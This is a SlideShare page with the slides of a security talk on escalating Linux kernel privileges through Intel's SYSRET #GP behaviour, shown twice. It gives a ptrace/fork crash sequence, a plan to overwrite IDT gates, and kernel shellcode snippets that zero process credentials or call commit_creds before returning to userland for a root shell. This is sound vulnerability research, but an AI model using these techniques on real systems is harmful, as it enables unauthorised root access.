SlideShare une entreprise Scribd logo
1  sur  38
Télécharger pour lire hors ligne
Exploiting the Linux Kernel via 
Intel's SYSRET Implementation 
Niko@FluxFingers
Outline 
● Syscalls and Context Switches 
● Canonical Addresses 
● SYSRET #GP Triggering 
● Step by Step Exploitation and Rooting
Linux x86_64 Syscalls 
● On OLD x86 Processors int $0x80 with Nr. in %eax 
and Params in %ebx, %ecx, etc 
○ However it’s super slow and got replaced with Intel’s 
SYSENTER mechanism 
● x86_64 uses AMD’s SYSCALL with Params in %rdi, % 
rsi, %rdx, %rcx, ... 
○ Faster to handle than the whole interrupt path 
○ Intel CPUs adapted SYSCALL according to AMD’s specs since it 
became the standard syscall-mechanism
SYSCALL/SYSRET 
● Whenever a syscall is invoked via SYSCALL a 
context switch to kernel mode takes place 
○ When leaving the syscall the kernel needs to restore specific 
userland registers 
○ And transfer back to ring3 with SYSRET 
● SYSRET is fast since it “only” needs to: 
○ Load the saved %rip from %rcx 
○ Swap %cs back to ring3 mode 
● The kernel itself has to make sure to restore all other 
userland registers before executing SYSRET
SYSCALL/SYSRET 
0x0000000000000000 
0x0000000000400000 
Process (/bin/cat) 
.text, .data, .bss, Heap 
0x00000000006XXXXX 
Shared Libraries 
0x00007ffffXXXXXXX 
Stack 
0x00007fXXXXXXXXXX 
VSYSCALL 
0xffffffffff600000 
0xffffffff80000000 
Kernel Memory 
SYSCALL
SYSCALL/SYSRET 
0x0000000000000000 
0x0000000000400000 
Process (/bin/cat) 
.text, .data, .bss, Heap 
0x00000000006XXXXX 
Shared Libraries 
0x00007ffffXXXXXXX 
Stack 
0x00007fXXXXXXXXXX 
VSYSCALL 
0xffffffffff600000 
0xffffffff80000000 
Kernel Memory 
SYSRET
How Linux handles SYSRET 
● arch/x86/kernel/entry_64.S: 
ret_from_sys_call: 
movl $_TIF_ALLWORK_MASK,%edi 
... 
sysret_check: 
... 
movq RIP-ARGOFFSET(%rsp),%rcx 
CFI_REGISTER rip,rcx 
RESTORE_ARGS 1,-ARG_SKIP,0 
movq PER_CPU_VAR(old_rsp), %rsp 
USERGS_SYSRET64 
● The kernel makes sure to restore %rsp and %gs etc 
and calls SYSRET in the end
Canonical Addresses 
● On x86_64 registers are 64 bit wide 
● The instruction pointer (%rip) can only use 48 bits 
○ 48 Bits == balanced value for page-tables/accessible memory 
● Leftover bits of %rip used for CPU specific tricks 
○ like NX bit on position 63 
● Meaning the value of %rip has to be “canonical” aka 
between 
○ 0x0000000000000000 -> 0x00007FFFFFFFFFFF 
○ 0x00FFFFFFFFFFFFFF -> 0xFFFF800000000000 
● (Bits 48 .. 63 have to be copies of bit 47) 
● Non-canonical values in %rip are not allowed and will 
trigger exceptions in certain cases
Non-canonical addresses and SYSRET 
● Whenever a SYSRET is executed and the CPU sees 
a non-canonical value in %rcx it triggers a #GP 
● AMD specs however never defined when the #GP 
will actually happen 
● Clever researches at XEN found out AMD CPUs will 
trigger #GP when back in Usermode 
● Not so on Intel ...
Intel’s Version of SYSRET 
● AMD’s specs omitted the check for non-canonical 
values in %rcx / %rip 
● Intel decided to check for non-canonical values 
before the privilege level is changed
Intel’s Version of SYSRET 
● Triggering a #GP from kernel mode has 
consequences on Linux 
● Recall that prior to executing SYSRET Linux 
restores the userland %rsp and swaps %gs 
● Intel’s SYSRET will #GP on the userland stack while 
still being in ring0
#GP on userland %rsp 
● #GP is an exception reached via an IDT entry: 
arch/x86/kernel/traps.c: 
set_intr_gate(X86_TRAP_GP, general_protection); 
● Where general_protection resolves to an error_entry macro in 
arch/x86/kernel/entry_64.S: 
.macro errorentry sym do_sym 
ENTRY(sym) 
XCPT_FRAME 
ASM_CLAC 
PARAVIRT_ADJUST_EXCEPTION_FRAME 
subq $ORIG_RAX-R15, %rsp 
CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15 
call error_entry 
...
#GP on userland %rsp 
● error_entry sets up an exception stack and backups all registers: 
ENTRY(error_entry) 
XCPT_FRAME 
CFI_ADJUST_CFA_OFFSET 15*8 
cld 
movq_cfi rdi, RDI+8 
movq_cfi rsi, RSI+8 
movq_cfi rdx, RDX+8 
… 
● where movq_cfi is defined as 
.macro movq_cfi reg offset=0 
movq %reg, offset(%rsp) 
CFI_REL_OFFSET reg, offset 
.endm
#GP on userland %rsp 
● When setting up the stack frame in error_entry all 
(general) registers are saved to x(%rsp) / [rsp+x] 
● The kernel restored the userland %rsp and 
registers before SYSRET 
● => Arbitrary memory write while in ring0 
● Classic possibility for privilege escalation
Linux’ Protection against n/c %rip 
● This behaviour already bit Linux in 2006 (CVE- 
2006-0744) 
● To make sure no code lands up in non-canonical 
address space (or right before) a guard page was 
introduced 
● mmap(0x7ffffffff000, 4096, PROT_READ … will 
return ENOMEM 
● This way SYSRET “shouldn’t” return to any n/c 
address
Linux’ Protection against n/c %rip 
● Another possibility is using a “safe” IRET path for 
returning back to ring3 
○ IRET requires ring3-backup on the stack to return to user-code 
○ Is slower than SYSRET 
● The ptrace interface sets an IRET path most of the 
time 
● However some syscalls use a SYSRET path albeit 
being ptraced 
● One example is fork() since it signals with 
ptrace_event() that does not force IRET
Crash PoC 
● fork() a child 
● Child sets PTRACE_TRACEME 
● Raise SIGSTOP 
● Parent sets PTRACE_O_TRACEFORK 
● Child fork()s again 
● Parent catches this fork 
● And uses PTRACE_SETREGS to set %rip to n/c 
● Pivots %rsp to arbitrary place 
● And PTRACE_CONTINUEs 
● fork() will return with SYSRET with n/c %rcx 
● CPU will #GP, Pagefault, Doublefault and Panic
How to get root
The plan 
● We need to get Kernel Code Execution between 
the #GP and Panic 
● Then restore the damage we have done 
● Set credentials of current process to 0 
● Return back to userland 
● And open shell
The target 
● Since #GP will always trigger a Pagefault and 
Doublefault we can pivot %rsp back to IDT 
● And set 2 specific registers to craft a fake IDT gate 
● That will be placed instead of the orig Page- or 
Doublefault handler.
IDT Layout 
● We can read IDTR with the sidt-instruction
IDT Gate Entry 
● And setup a new gate with modified “Offsets”
The target 
● Before we trigger #GP we can allocate a Landing 
Area in Userland 
● Where we copy code that will be executed 
● Craft a fake IDT gate that points to this area 
● Triggering #GP will then overwrite e.g. Doublefault 
with the fake gate 
● And the kernel will jump to Userland and execute 
our code with kernel privs
Kernel Shellcode 
● Inside this code we will have to swapgs in order to 
access kernel structures 
● Then we carefully rebuild all IDT entries that were 
trashed in the overwrite process 
● Then we can raise process credentials
Process structures 
● Each process in userland has an associated kernel 
structure (thread_union) that builds the kernel 
stack: 
thread_union 
thread_info 
Kernel Stack
Process structures 
● thread_info itself has an element that points to 
task_struct 
thread_info 
*task_struct 
*exec_domain 
…
Process structures < 2.6.29 
● task_struct contains lots of info about the running 
task 
● and its credentials 
task_struct 
state 
stack 
usage 
... 
uid, guid, caps,...
Process structures < 2.6.29 
task_struct 
state 
stack 
usage 
... 
uid, guid, caps,... 
thread_info 
*task_struct 
*exec_domain 
… 
thread_union 
thread_info 
Kernel Stack
Kernel Shellcode 
● On < 2.6.29 raising process credentials is a matter 
of finding uid, gid and caps in task_struct 
● And patching them to 0 
● Luckily %gs in kernel mode contains offset to 
x8664_pda (/include/asm-x86/pda.h) 
/* Per processor datastructure. %gs points to it while the kernel runs */ 
struct x8664_pda { 
struct task_struct *pcurrent; /* 0 Current process */ 
unsigned long data_offset; /* 8 Per cpu data offset from linker address */ 
unsigned long kernelstack; /* 16 top of kernel stack for current */ 
unsigned long oldrsp; /* 24 user rsp for system call */ 
int irqcount; /* 32 Irq nesting counter. Starts with -1 */ 
int cpunumber; /* 36 Logical CPU number */ 
#ifdef CONFIG_CC_STACKPROTECTOR 
unsigned long stack_canary; 
...
Kernel Shellcode 
● %gs:0 will point to task_struct 
● So we can simply: 
asm("movq %%gs:0, %0" : "=r"(ptr)); 
cred = (uint32_t *)ptr; 
for (i = 0; i < 1000; i++, cred++) { 
if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid && 
cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) { 
cred[0] = cred[1] = cred[2] = cred[3] = 0; 
cred[4] = cred[5] = cred[6] = cred[7] = 0; 
● Where uid/gid are getuid() and getdid() 
● And our process will be root
Kernel Shellcode 
● On > 2.6.29 x8664_pda is removed 
● And task_struct contains a new member called 
cred (credential records) 
● If %rsp wasn’t modified we could walk back to top 
of stack to find thread_info 
● And do heuristic scanning to find thread_info- 
>task_struct->creds->uid/gid 
● However with credential records come two new 
functions 
● prepare_kernel_cred / commit_creds
Kernel Shellcode 
● prepare_kernel_cred creates a new clean 
credentials structure 
● commit_creds installs the new cred to the current 
task 
● Both symbols are exported through /proc/kallsyms 
or /boot/System.map 
● Kernel shellcode just needs to 
commit_creds(prepare_kernel_cred(0)); 
● And we’re root again
Kernel Shellcode 
● Next we will have to cleanly return back to 
userland 
● Easiest method is to use IRET: 
__asm__ __volatile__( 
"movq %0, 0x20(%%rsp);" 
"movq %1, 0x18(%%rsp);" 
"movq %2, 0x10(%%rsp);" 
"movq %3, 0x08(%%rsp);" 
"movq %4, 0x00(%%rsp);" 
"swapgs;" 
"iretq;" 
:: "i"(USER_SS), 
"i"(user_stack), 
"i"(USER_FL), 
"i"(USER_CS), 
"i"(user_code) 
); 
● Where user_code points to memory in userland 
that should be executed when kernel exits
Popping uid=0(root) 
● user_code can do anything now since it runs as 
root 
● So we can simply execve(/bin/sh) from there 
● However that happens inside the child so we have 
to bring the rootshell back to the parent 
● Or we just chmod() or setxattr() to drop a root-shell
Demo Time
Liminations 
● These techniques work well with 2.6.18 - 3.9.X 
3.10 mitigates the IDT attack by remapping it to 
rodata (arch/x86/kernel/traps.c) 
__set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO); 
idt_descr.address = fix_to_virt(FIX_RO_IDT); 
● CPUs with SMAP/SMEP will detect accessing 
userland code while still being in ring0 
● Grsecurity will provide handful of protections to 
make this bug a pain to exploit 
○ GRKERNSEC_RANDSTRUCT 
○ PAX_MEMORY_UDEREF 
○ GRKERNSEC_HIDESYM 
○ ...
Further thoughts 
● Linux fix is weird (“only” forces ptrace_stop() to 
use IRET) 
● Syscalls can still return via SYSRET 
● Also bug within SYSRET is still present 
● Since it’s a hardware issue it might be present in 
other OSes in different variations (OHAI 2006) 
● Any1 wanna check FreeBSD …?
Questions?

Contenu connexe

Tendances

Tendances (20)

Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File System
 
Q2.12: Debugging with GDB
Q2.12: Debugging with GDBQ2.12: Debugging with GDB
Q2.12: Debugging with GDB
 
Linux booting Process
Linux booting ProcessLinux booting Process
Linux booting Process
 
Linux Programming
Linux ProgrammingLinux Programming
Linux Programming
 
Linux Crash Dump Capture and Analysis
Linux Crash Dump Capture and AnalysisLinux Crash Dump Capture and Analysis
Linux Crash Dump Capture and Analysis
 
COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019COM Hijacking Techniques - Derbycon 2019
COM Hijacking Techniques - Derbycon 2019
 
Block I/O Layer Tracing: blktrace
Block I/O Layer Tracing: blktraceBlock I/O Layer Tracing: blktrace
Block I/O Layer Tracing: blktrace
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratch
 
Slab Allocator in Linux Kernel
Slab Allocator in Linux KernelSlab Allocator in Linux Kernel
Slab Allocator in Linux Kernel
 
仮想化技術によるマルウェア対策とその問題点
仮想化技術によるマルウェア対策とその問題点仮想化技術によるマルウェア対策とその問題点
仮想化技術によるマルウェア対策とその問題点
 
Interpreter, Compiler, JIT from scratch
Interpreter, Compiler, JIT from scratchInterpreter, Compiler, JIT from scratch
Interpreter, Compiler, JIT from scratch
 
Namespaces and cgroups - the basis of Linux containers
Namespaces and cgroups - the basis of Linux containersNamespaces and cgroups - the basis of Linux containers
Namespaces and cgroups - the basis of Linux containers
 
Linux Containers (LXC)
Linux Containers (LXC)Linux Containers (LXC)
Linux Containers (LXC)
 
Podman rootless containers
Podman rootless containersPodman rootless containers
Podman rootless containers
 
Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)
 
RAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial TradecraftRAT - Repurposing Adversarial Tradecraft
RAT - Repurposing Adversarial Tradecraft
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalation
 
The Forefront of the Development for NVDIMM on Linux Kernel (Linux Plumbers c...
The Forefront of the Development for NVDIMM on Linux Kernel (Linux Plumbers c...The Forefront of the Development for NVDIMM on Linux Kernel (Linux Plumbers c...
The Forefront of the Development for NVDIMM on Linux Kernel (Linux Plumbers c...
 
BPF - in-kernel virtual machine
BPF - in-kernel virtual machineBPF - in-kernel virtual machine
BPF - in-kernel virtual machine
 
Windows Operating System Archaeology
Windows Operating System ArchaeologyWindows Operating System Archaeology
Windows Operating System Archaeology
 

Similaire à Exploiting the Linux Kernel via Intel's SYSRET Implementation

Vpu technology &gpgpu computing
Vpu technology &gpgpu computingVpu technology &gpgpu computing
Vpu technology &gpgpu computing
Arka Ghosh
 
Vpu technology &gpgpu computing
Vpu technology &gpgpu computingVpu technology &gpgpu computing
Vpu technology &gpgpu computing
Arka Ghosh
 
Vpu technology &gpgpu computing
Vpu technology &gpgpu computingVpu technology &gpgpu computing
Vpu technology &gpgpu computing
Arka Ghosh
 
망고100 보드로 놀아보자 15
망고100 보드로 놀아보자 15망고100 보드로 놀아보자 15
망고100 보드로 놀아보자 15
종인 전
 
Vpu technology &gpgpu computing
Vpu technology &gpgpu computingVpu technology &gpgpu computing
Vpu technology &gpgpu computing
Arka Ghosh
 

Similaire à Exploiting the Linux Kernel via Intel's SYSRET Implementation (20)

Kernel Recipes 2016 - entry_*.S: A carefree stroll through kernel entry code
Kernel Recipes 2016 - entry_*.S: A carefree stroll through kernel entry codeKernel Recipes 2016 - entry_*.S: A carefree stroll through kernel entry code
Kernel Recipes 2016 - entry_*.S: A carefree stroll through kernel entry code
 
The Silence of the Canaries
The Silence of the CanariesThe Silence of the Canaries
The Silence of the Canaries
 
Linux Initialization Process (2)
Linux Initialization Process (2)Linux Initialization Process (2)
Linux Initialization Process (2)
 
lecture_GPUArchCUDA02-CUDAMem.pdf
lecture_GPUArchCUDA02-CUDAMem.pdflecture_GPUArchCUDA02-CUDAMem.pdf
lecture_GPUArchCUDA02-CUDAMem.pdf
 
Experience on porting HIGHMEM and KASAN to RISC-V at COSCUP 2020
Experience on porting HIGHMEM and KASAN to RISC-V at COSCUP 2020Experience on porting HIGHMEM and KASAN to RISC-V at COSCUP 2020
Experience on porting HIGHMEM and KASAN to RISC-V at COSCUP 2020
 
Roll your own toy unix clone os
Roll your own toy unix clone osRoll your own toy unix clone os
Roll your own toy unix clone os
 
Kernel debug log and console on openSUSE
Kernel debug log and console on openSUSEKernel debug log and console on openSUSE
Kernel debug log and console on openSUSE
 
Linux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloudLinux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloud
 
Programar para GPUs
Programar para GPUsProgramar para GPUs
Programar para GPUs
 
kdump: usage and_internals
kdump: usage and_internalskdump: usage and_internals
kdump: usage and_internals
 
Geep networking stack-linuxkernel
Geep networking stack-linuxkernelGeep networking stack-linuxkernel
Geep networking stack-linuxkernel
 
LSFMM 2019 BPF Observability
LSFMM 2019 BPF ObservabilityLSFMM 2019 BPF Observability
LSFMM 2019 BPF Observability
 
Vpu technology &gpgpu computing
Vpu technology &gpgpu computingVpu technology &gpgpu computing
Vpu technology &gpgpu computing
 
Vpu technology &gpgpu computing
Vpu technology &gpgpu computingVpu technology &gpgpu computing
Vpu technology &gpgpu computing
 
Vpu technology &gpgpu computing
Vpu technology &gpgpu computingVpu technology &gpgpu computing
Vpu technology &gpgpu computing
 
Linux kernel debugging
Linux kernel debuggingLinux kernel debugging
Linux kernel debugging
 
Userspace adaptive spinlocks with rseq
Userspace adaptive spinlocks with rseqUserspace adaptive spinlocks with rseq
Userspace adaptive spinlocks with rseq
 
망고100 보드로 놀아보자 15
망고100 보드로 놀아보자 15망고100 보드로 놀아보자 15
망고100 보드로 놀아보자 15
 
Vpu technology &gpgpu computing
Vpu technology &gpgpu computingVpu technology &gpgpu computing
Vpu technology &gpgpu computing
 
Introduction to CUDA
Introduction to CUDAIntroduction to CUDA
Introduction to CUDA
 

Dernier

biology HL practice questions IB BIOLOGY
biology HL practice questions IB BIOLOGYbiology HL practice questions IB BIOLOGY
biology HL practice questions IB BIOLOGY
1301aanya
 
Seismic Method Estimate velocity from seismic data.pptx
Seismic Method Estimate velocity from seismic  data.pptxSeismic Method Estimate velocity from seismic  data.pptx
Seismic Method Estimate velocity from seismic data.pptx
AlMamun560346
 
dkNET Webinar "Texera: A Scalable Cloud Computing Platform for Sharing Data a...
dkNET Webinar "Texera: A Scalable Cloud Computing Platform for Sharing Data a...dkNET Webinar "Texera: A Scalable Cloud Computing Platform for Sharing Data a...
dkNET Webinar "Texera: A Scalable Cloud Computing Platform for Sharing Data a...
dkNET
 
Formation of low mass protostars and their circumstellar disks
Formation of low mass protostars and their circumstellar disksFormation of low mass protostars and their circumstellar disks
Formation of low mass protostars and their circumstellar disks
Sérgio Sacani
 
Conjugation, transduction and transformation
Conjugation, transduction and transformationConjugation, transduction and transformation
Conjugation, transduction and transformation
Areesha Ahmad
 

Dernier (20)

SAMASTIPUR CALL GIRL 7857803690 LOW PRICE ESCORT SERVICE
SAMASTIPUR CALL GIRL 7857803690  LOW PRICE  ESCORT SERVICESAMASTIPUR CALL GIRL 7857803690  LOW PRICE  ESCORT SERVICE
SAMASTIPUR CALL GIRL 7857803690 LOW PRICE ESCORT SERVICE
 
biology HL practice questions IB BIOLOGY
biology HL practice questions IB BIOLOGYbiology HL practice questions IB BIOLOGY
biology HL practice questions IB BIOLOGY
 
Site Acceptance Test .
Site Acceptance Test                    .Site Acceptance Test                    .
Site Acceptance Test .
 
Justdial Call Girls In Indirapuram, Ghaziabad, 8800357707 Escorts Service
Justdial Call Girls In Indirapuram, Ghaziabad, 8800357707 Escorts ServiceJustdial Call Girls In Indirapuram, Ghaziabad, 8800357707 Escorts Service
Justdial Call Girls In Indirapuram, Ghaziabad, 8800357707 Escorts Service
 
Unit5-Cloud.pptx for lpu course cse121 o
Unit5-Cloud.pptx for lpu course cse121 oUnit5-Cloud.pptx for lpu course cse121 o
Unit5-Cloud.pptx for lpu course cse121 o
 
module for grade 9 for distance learning
module for grade 9 for distance learningmodule for grade 9 for distance learning
module for grade 9 for distance learning
 
Kochi ❤CALL GIRL 84099*07087 ❤CALL GIRLS IN Kochi ESCORT SERVICE❤CALL GIRL
Kochi ❤CALL GIRL 84099*07087 ❤CALL GIRLS IN Kochi ESCORT SERVICE❤CALL GIRLKochi ❤CALL GIRL 84099*07087 ❤CALL GIRLS IN Kochi ESCORT SERVICE❤CALL GIRL
Kochi ❤CALL GIRL 84099*07087 ❤CALL GIRLS IN Kochi ESCORT SERVICE❤CALL GIRL
 
9654467111 Call Girls In Raj Nagar Delhi Short 1500 Night 6000
9654467111 Call Girls In Raj Nagar Delhi Short 1500 Night 60009654467111 Call Girls In Raj Nagar Delhi Short 1500 Night 6000
9654467111 Call Girls In Raj Nagar Delhi Short 1500 Night 6000
 
Seismic Method Estimate velocity from seismic data.pptx
Seismic Method Estimate velocity from seismic  data.pptxSeismic Method Estimate velocity from seismic  data.pptx
Seismic Method Estimate velocity from seismic data.pptx
 
STS-UNIT 4 CLIMATE CHANGE POWERPOINT PRESENTATION
STS-UNIT 4 CLIMATE CHANGE POWERPOINT PRESENTATIONSTS-UNIT 4 CLIMATE CHANGE POWERPOINT PRESENTATION
STS-UNIT 4 CLIMATE CHANGE POWERPOINT PRESENTATION
 
Pulmonary drug delivery system M.pharm -2nd sem P'ceutics
Pulmonary drug delivery system M.pharm -2nd sem P'ceuticsPulmonary drug delivery system M.pharm -2nd sem P'ceutics
Pulmonary drug delivery system M.pharm -2nd sem P'ceutics
 
Dopamine neurotransmitter determination using graphite sheet- graphene nano-s...
Dopamine neurotransmitter determination using graphite sheet- graphene nano-s...Dopamine neurotransmitter determination using graphite sheet- graphene nano-s...
Dopamine neurotransmitter determination using graphite sheet- graphene nano-s...
 
COST ESTIMATION FOR A RESEARCH PROJECT.pptx
COST ESTIMATION FOR A RESEARCH PROJECT.pptxCOST ESTIMATION FOR A RESEARCH PROJECT.pptx
COST ESTIMATION FOR A RESEARCH PROJECT.pptx
 
dkNET Webinar "Texera: A Scalable Cloud Computing Platform for Sharing Data a...
dkNET Webinar "Texera: A Scalable Cloud Computing Platform for Sharing Data a...dkNET Webinar "Texera: A Scalable Cloud Computing Platform for Sharing Data a...
dkNET Webinar "Texera: A Scalable Cloud Computing Platform for Sharing Data a...
 
High Profile 🔝 8250077686 📞 Call Girls Service in GTB Nagar🍑
High Profile 🔝 8250077686 📞 Call Girls Service in GTB Nagar🍑High Profile 🔝 8250077686 📞 Call Girls Service in GTB Nagar🍑
High Profile 🔝 8250077686 📞 Call Girls Service in GTB Nagar🍑
 
COMPUTING ANTI-DERIVATIVES (Integration by SUBSTITUTION)
COMPUTING ANTI-DERIVATIVES(Integration by SUBSTITUTION)COMPUTING ANTI-DERIVATIVES(Integration by SUBSTITUTION)
COMPUTING ANTI-DERIVATIVES (Integration by SUBSTITUTION)
 
Formation of low mass protostars and their circumstellar disks
Formation of low mass protostars and their circumstellar disksFormation of low mass protostars and their circumstellar disks
Formation of low mass protostars and their circumstellar disks
 
Conjugation, transduction and transformation
Conjugation, transduction and transformationConjugation, transduction and transformation
Conjugation, transduction and transformation
 
pumpkin fruit fly, water melon fruit fly, cucumber fruit fly
pumpkin fruit fly, water melon fruit fly, cucumber fruit flypumpkin fruit fly, water melon fruit fly, cucumber fruit fly
pumpkin fruit fly, water melon fruit fly, cucumber fruit fly
 
PSYCHOSOCIAL NEEDS. in nursing II sem pptx
PSYCHOSOCIAL NEEDS. in nursing II sem pptxPSYCHOSOCIAL NEEDS. in nursing II sem pptx
PSYCHOSOCIAL NEEDS. in nursing II sem pptx
 

Exploiting the Linux Kernel via Intel's SYSRET Implementation

  • 1. Exploiting the Linux Kernel via Intel's SYSRET Implementation Niko@FluxFingers
  • 2. Outline ● Syscalls and Context Switches ● Canonical Addresses ● SYSRET #GP Triggering ● Step by Step Exploitation and Rooting
  • 3. Linux x86_64 Syscalls ● On OLD x86 Processors int $0x80 with Nr. in %eax and Params in %ebx, %ecx, etc ○ However it’s super slow and got replaced with Intel’s SYSENTER mechanism ● x86_64 uses AMD’s SYSCALL with Params in %rdi, % rsi, %rdx, %rcx, ... ○ Faster to handle than the whole interrupt path ○ Intel CPUs adapted SYSCALL according to AMD’s specs since it became the standard syscall-mechanism
  • 4. SYSCALL/SYSRET ● Whenever a syscall is invoked via SYSCALL a context switch to kernel mode takes place ○ When leaving the syscall the kernel needs to restore specific userland registers ○ And transfer back to ring3 with SYSRET ● SYSRET is fast since it “only” needs to: ○ Load the saved %rip from %rcx ○ Swap %cs back to ring3 mode ● The kernel itself has to make sure to restore all other userland registers before executing SYSRET
  • 5. SYSCALL/SYSRET 0x0000000000000000 0x0000000000400000 Process (/bin/cat) .text, .data, .bss, Heap 0x00000000006XXXXX Shared Libraries 0x00007ffffXXXXXXX Stack 0x00007fXXXXXXXXXX VSYSCALL 0xffffffffff600000 0xffffffff80000000 Kernel Memory SYSCALL
  • 6. SYSCALL/SYSRET 0x0000000000000000 0x0000000000400000 Process (/bin/cat) .text, .data, .bss, Heap 0x00000000006XXXXX Shared Libraries 0x00007ffffXXXXXXX Stack 0x00007fXXXXXXXXXX VSYSCALL 0xffffffffff600000 0xffffffff80000000 Kernel Memory SYSRET
  • 7. How Linux handles SYSRET ● arch/x86/kernel/entry_64.S: ret_from_sys_call: movl $_TIF_ALLWORK_MASK,%edi ... sysret_check: ... movq RIP-ARGOFFSET(%rsp),%rcx CFI_REGISTER rip,rcx RESTORE_ARGS 1,-ARG_SKIP,0 movq PER_CPU_VAR(old_rsp), %rsp USERGS_SYSRET64 ● The kernel makes sure to restore %rsp and %gs etc and calls SYSRET in the end
  • 8. Canonical Addresses ● On x86_64 registers are 64 bit wide ● The instruction pointer (%rip) can only use 48 bits ○ 48 Bits == balanced value for page-tables/accessible memory ● Leftover bits of %rip used for CPU specific tricks ○ like NX bit on position 63 ● Meaning the value of %rip has to be “canonical” aka between ○ 0x0000000000000000 -> 0x00007FFFFFFFFFFF ○ 0x00FFFFFFFFFFFFFF -> 0xFFFF800000000000 ● (Bits 48 .. 63 have to be copies of bit 47) ● Non-canonical values in %rip are not allowed and will trigger exceptions in certain cases
  • 9. Non-canonical addresses and SYSRET ● Whenever a SYSRET is executed and the CPU sees a non-canonical value in %rcx it triggers a #GP ● AMD specs however never defined when the #GP will actually happen ● Clever researches at XEN found out AMD CPUs will trigger #GP when back in Usermode ● Not so on Intel ...
  • 10. Intel’s Version of SYSRET ● AMD’s specs omitted the check for non-canonical values in %rcx / %rip ● Intel decided to check for non-canonical values before the privilege level is changed
  • 11. Intel’s Version of SYSRET ● Triggering a #GP from kernel mode has consequences on Linux ● Recall that prior to executing SYSRET Linux restores the userland %rsp and swaps %gs ● Intel’s SYSRET will #GP on the userland stack while still being in ring0
  • 12. #GP on userland %rsp ● #GP is an exception reached via an IDT entry: arch/x86/kernel/traps.c: set_intr_gate(X86_TRAP_GP, general_protection); ● Where general_protection resolves to an error_entry macro in arch/x86/kernel/entry_64.S: .macro errorentry sym do_sym ENTRY(sym) XCPT_FRAME ASM_CLAC PARAVIRT_ADJUST_EXCEPTION_FRAME subq $ORIG_RAX-R15, %rsp CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15 call error_entry ...
  • 13. #GP on userland %rsp ● error_entry sets up an exception stack and backups all registers: ENTRY(error_entry) XCPT_FRAME CFI_ADJUST_CFA_OFFSET 15*8 cld movq_cfi rdi, RDI+8 movq_cfi rsi, RSI+8 movq_cfi rdx, RDX+8 … ● where movq_cfi is defined as .macro movq_cfi reg offset=0 movq %reg, offset(%rsp) CFI_REL_OFFSET reg, offset .endm
  • 14. #GP on userland %rsp ● When setting up the stack frame in error_entry all (general) registers are saved to x(%rsp) / [rsp+x] ● The kernel restored the userland %rsp and registers before SYSRET ● => Arbitrary memory write while in ring0 ● Classic possibility for privilege escalation
  • 15. Linux’ Protection against n/c %rip ● This behaviour already bit Linux in 2006 (CVE- 2006-0744) ● To make sure no code lands up in non-canonical address space (or right before) a guard page was introduced ● mmap(0x7ffffffff000, 4096, PROT_READ … will return ENOMEM ● This way SYSRET “shouldn’t” return to any n/c address
  • 16. Linux’ Protection against n/c %rip ● Another possibility is using a “safe” IRET path for returning back to ring3 ○ IRET requires ring3-backup on the stack to return to user-code ○ Is slower than SYSRET ● The ptrace interface sets an IRET path most of the time ● However some syscalls use a SYSRET path albeit being ptraced ● One example is fork() since it signals with ptrace_event() that does not force IRET
  • 17. Crash PoC ● fork() a child ● Child sets PTRACE_TRACEME ● Raise SIGSTOP ● Parent sets PTRACE_O_TRACEFORK ● Child fork()s again ● Parent catches this fork ● And uses PTRACE_SETREGS to set %rip to n/c ● Pivots %rsp to arbitrary place ● And PTRACE_CONTINUEs ● fork() will return with SYSRET with n/c %rcx ● CPU will #GP, Pagefault, Doublefault and Panic
  • 18. How to get root
  • 19. The plan ● We need to get Kernel Code Execution between the #GP and Panic ● Then restore the damage we have done ● Set credentials of current process to 0 ● Return back to userland ● And open shell
  • 20. The target ● Since #GP will always trigger a Pagefault and Doublefault we can pivot %rsp back to IDT ● And set 2 specific registers to craft a fake IDT gate ● That will be placed instead of the orig Page- or Doublefault handler.
  • 21. IDT Layout ● We can read IDTR with the sidt-instruction
  • 22. IDT Gate Entry ● And setup a new gate with modified “Offsets”
  • 23. The target ● Before we trigger #GP we can allocate a Landing Area in Userland ● Where we copy code that will be executed ● Craft a fake IDT gate that points to this area ● Triggering #GP will then overwrite e.g. Doublefault with the fake gate ● And the kernel will jump to Userland and execute our code with kernel privs
  • 24. Kernel Shellcode ● Inside this code we will have to swapgs in order to access kernel structures ● Then we carefully rebuild all IDT entries that were trashed in the overwrite process ● Then we can raise process credentials
  • 25. Process structures ● Each process in userland has an associated kernel structure (thread_union) that builds the kernel stack: thread_union thread_info Kernel Stack
  • 26. Process structures ● thread_info itself has an element that points to task_struct thread_info *task_struct *exec_domain …
  • 27. Process structures < 2.6.29 ● task_struct contains lots of info about the running task ● and its credentials task_struct state stack usage ... uid, guid, caps,...
  • 28. Process structures < 2.6.29 task_struct state stack usage ... uid, guid, caps,... thread_info *task_struct *exec_domain … thread_union thread_info Kernel Stack
  • 29. Kernel Shellcode ● On < 2.6.29 raising process credentials is a matter of finding uid, gid and caps in task_struct ● And patching them to 0 ● Luckily %gs in kernel mode contains offset to x8664_pda (/include/asm-x86/pda.h) /* Per processor datastructure. %gs points to it while the kernel runs */ struct x8664_pda { struct task_struct *pcurrent; /* 0 Current process */ unsigned long data_offset; /* 8 Per cpu data offset from linker address */ unsigned long kernelstack; /* 16 top of kernel stack for current */ unsigned long oldrsp; /* 24 user rsp for system call */ int irqcount; /* 32 Irq nesting counter. Starts with -1 */ int cpunumber; /* 36 Logical CPU number */ #ifdef CONFIG_CC_STACKPROTECTOR unsigned long stack_canary; ...
